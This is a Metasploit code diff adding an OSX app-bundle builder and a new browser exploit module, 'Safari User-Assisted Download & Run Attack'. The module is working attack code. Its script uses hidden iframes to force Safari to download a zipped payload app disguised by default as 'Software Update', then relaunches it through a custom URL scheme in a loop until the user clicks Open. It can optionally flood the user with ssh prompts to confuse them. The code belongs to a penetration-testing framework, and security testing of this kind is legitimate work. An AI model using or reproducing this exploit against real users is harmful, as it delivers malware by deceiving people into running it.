Land rapid7#3065 - Safari User-Assisted Download & Run Attack

Author: wchen-r7

lib/msf/util/exe.rb

@@ -627,6 +627,48 @@ def self.to_osx_x64_macho(framework, code, opts={})
     return macho
   end
 
+  # @param [Hash] opts the options hash
+  # @option opts [String] :exe_name (random) the name of the macho exe file (never seen by the user)
+  # @option opts [String] :app_name (random) the name of the OSX app
+  # @option opts [String] :plist_extra ('') some extra data to shove inside the Info.plist file
+  # @return [String] zip archive containing an OSX .app directory
+  def self.to_osx_app(exe, opts={})
+    exe_name    = opts[:exe_name]    || Rex::Text.rand_text_alpha(8)
+    app_name    = opts[:app_name]    || Rex::Text.rand_text_alpha(8)
+    plist_extra = opts[:plist_extra] || ''
+
+    app_name.chomp!(".app")
+    app_name += ".app"
+
+    info_plist = %Q|
+      <?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+  <key>CFBundleExecutable</key>
+  <string>#{exe_name}</string>
+  <key>CFBundleIdentifier</key>
+  <string>com.#{exe_name}.app</string>
+  <key>CFBundleName</key>
+  <string>#{exe_name}</string>
+  <key>CFBundlePackageType</key>
+  <string>APPL</string>
+  #{plist_extra}
+</dict>
+</plist>
+    |
+
+    zip = Rex::Zip::Archive.new
+    zip.add_file("#{app_name}/", '')
+    zip.add_file("#{app_name}/Contents/", '')
+    zip.add_file("#{app_name}/Contents/MacOS/", '')
+    zip.add_file("#{app_name}/Contents/Resources/", '')
+    zip.add_file("#{app_name}/Contents/MacOS/#{exe_name}", exe)
+    zip.add_file("#{app_name}/Contents/Info.plist", info_plist)
+    zip.add_file("#{app_name}/Contents/PkgInfo", 'APPLaplt')
+    zip.pack
+  end
+
   # Create an ELF executable containing the payload provided in +code+
   #
   # For the default template, this method just appends the payload, checks if
@@ -1727,14 +1769,15 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
           end
       end
 
-    when 'macho'
+    when 'macho', 'osx-app'
       output = case arch
         when ARCH_X86,nil then to_osx_x86_macho(framework, code, exeopts)
         when ARCH_X86_64  then to_osx_x64_macho(framework, code, exeopts)
         when ARCH_X64     then to_osx_x64_macho(framework, code, exeopts)
         when ARCH_ARMLE   then to_osx_arm_macho(framework, code, exeopts)
         when ARCH_PPC     then to_osx_ppc_macho(framework, code, exeopts)
         end
+      output = Msf::Util::EXE.to_osx_app(output) if fmt == 'osx-app'
 
     when 'vba'
       output = Msf::Util::EXE.to_vba(framework, code, exeopts)
@@ -1787,6 +1830,7 @@ def self.to_executable_fmt_formats
       "macho",
       "msi",
       "msi-nouac",
+      "osx-app",
       "psh",
       "psh-net",
       "psh-reflection",

lib/rex/zip/archive.rb

@@ -17,6 +17,21 @@ def initialize(compmeth=CM_DEFLATE)
     @entries = []
   end
 
+  #
+  # Recursively adds a directory of files into the archive.
+  #
+  def add_r(dir)
+    path = File.dirname(dir)
+    Dir[File.join(dir, "**", "**")].each do |file|
+      relative = file.sub(/^#{path.chomp('/')}\//, '')
+      if File.directory?(file)
+        @entries << Entry.new(relative.chomp('/') + '/', '', @compmeth, nil, EFA_ISDIR, nil, nil)
+      else
+        contents = File.read(file, :mode => 'rb')
+        @entries << Entry.new(relative, contents, @compmeth, nil, nil, nil, nil)
+      end
+    end
+  end
 
   #
   # Create a new Entry and add it to the archive.

modules/exploits/osx/browser/safari_user_assisted_download_launch.rb

@@ -0,0 +1,159 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  # Note: might be nicer to do this with mounted FTP share, since we can
+  # unmount after the attack and not leave a trace on user's machine.
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Safari User-Assisted Download & Run Attack',
+      'Description'    => %q{
+        This module abuses some Safari functionality to force the download of a
+        zipped .app OSX application containing our payload. The app is then
+        invoked using a custom URL scheme. At this point, the user is presented
+        with Gatekeeper's prompt:
+
+        "APP_NAME" is an application downloaded from the internet. Are you sure you
+        want to open it?
+
+        If the user clicks "Open", the app and its payload are executed.
+
+        If the user has the "Only allow applications downloaded from Mac App Store
+        and identified developers (on by default on OS 10.8+), the user will see
+        an error dialog containing "can't be opened because it is from an unidentified
+        developer." To work around this issue, you will need to manually build and sign
+        an OSX app containing your payload with a custom URL handler called "openurl".
+
+        You can put newlines & unicode in your APP_NAME, although you must be careful not
+        to create a prompt that is too tall, or the user will not be able to click
+        the buttons, and will have to either logout or kill the CoreServicesUIAgent
+        process.
+      },
+      'License'        => MSF_LICENSE,
+      'Targets'        =>
+        [
+          [ 'Mac OS X x86 (Native Payload)',
+            {
+              'Platform' => 'osx',
+              'Arch' => ARCH_X86,
+            }
+          ],
+          [ 'Mac OS X x64 (Native Payload)',
+            {
+              'Platform' => 'osx',
+              'Arch' => ARCH_X64,
+            }
+          ]
+        ],
+      'DefaultTarget'  => 0,
+      'Author'         => [ 'joev' ],
+      'BrowserRequirements' => {
+        :source  => 'script',
+        :ua_name => HttpClients::SAFARI,
+        :os_name => OperatingSystems::MAC_OSX,
+
+        # On 10.6.8 (Safari 5.x), a dialog never appears unless the user
+        # has already manually launched the dropped exe
+        :ua_ver  => lambda { |ver| ver.to_i != 5 }
+      }
+    ))
+
+    register_options([
+      OptString.new('APP_NAME', [false, "The name of the app to display", "Software Update"]),
+      OptInt.new('DELAY', [false, "Number of milliseconds to wait before trying to open", 2500]),
+      OptBool.new('LOOP', [false, "Continually display prompt until app is run", true]),
+      OptInt.new('LOOP_DELAY', [false, "Time to wait before trying to launch again", 3000]),
+      OptBool.new('CONFUSE', [false, "Pops up a million Terminal prompts to confuse the user", false]),
+      OptString.new('CONTENT', [false, "Content to display in browser", "Redirecting, please wait..."]),
+      OptPath.new('SIGNED_APP', [false, "A signed .app to drop, to workaround OS 10.8+ settings"])
+    ], self.class)
+  end
+
+  def on_request_exploit(cli, request, profile)
+    if request.uri =~ /\.zip/
+      print_status("Sending .zip containing app.")
+      seed = request.qstring['seed'].to_i
+      send_response(cli, app_zip(seed), { 'Content-Type' => 'application/zip' })
+    else
+      # send initial HTML page
+      print_status("Sending #{self.name}")
+      send_response_html(cli, generate_html)
+    end
+    handler(cli)
+  end
+
+  def generate_html
+    %Q|
+    <html><body>
+    #{datastore['CONTENT']}
+    <iframe id='f' src='about:blank' style='position:fixed;left:-500px;top:-500px;width:1px;height:1px;'>
+    </iframe>
+    <iframe id='f2' src='about:blank' style='position:fixed;left:-500px;top:-500px;width:1px;height:1px;'>
+    </iframe>
+    <script>
+    (function() {
+      var r = parseInt(Math.random() * 9999999);
+      if (#{datastore['SIGNED_APP'].present?}) r = '';
+      var f = document.getElementById('f');
+      var f2 = document.getElementById('f2');
+      f.src = "#{get_module_resource}/#{datastore['APP_NAME']}.zip?seed="+r;
+      window.setTimeout(function(){
+        var go = function() { f.src = "openurl"+r+"://a"; };
+        go();
+        if (#{datastore['LOOP']}) {
+          window.setInterval(go, #{datastore['LOOP_DELAY']});
+        };
+      }, #{datastore['DELAY']});
+      if (#{datastore['CONFUSE']}) {
+        var w = 0;
+        var ivl = window.setInterval(function(){
+          f2.src = 'ssh://ssh@ssh';
+          if (w++ > 200) clearInterval(ivl);
+        }, #{datastore['LOOP_DELAY']});
+      }
+    })();
+    </script>
+    </body></html>
+    |
+  end
+
+  def app_zip(seed)
+    if datastore['SIGNED_APP'].present?
+      print_status "Zipping custom app bundle..."
+      zip = Rex::Zip::Archive.new
+      zip.add_r(datastore['SIGNED_APP'])
+      zip.pack
+    else
+      plist_extra = %Q|
+        <key>CFBundleURLTypes</key>
+        <array>
+          <dict>
+            <key>CFBundleURLName</key>
+            <string>Local File</string>
+            <key>CFBundleURLSchemes</key>
+            <array>
+              <string>openurl#{seed}</string>
+            </array>
+          </dict>
+        </array>
+      |
+
+      my_payload = generate_payload_exe(:platform => [Msf::Module::Platform::OSX])
+      Msf::Util::EXE.to_osx_app(my_payload,
+        :app_name    => datastore['APP_NAME'],
+        :plist_extra => plist_extra
+      )
+    end
+  end
+end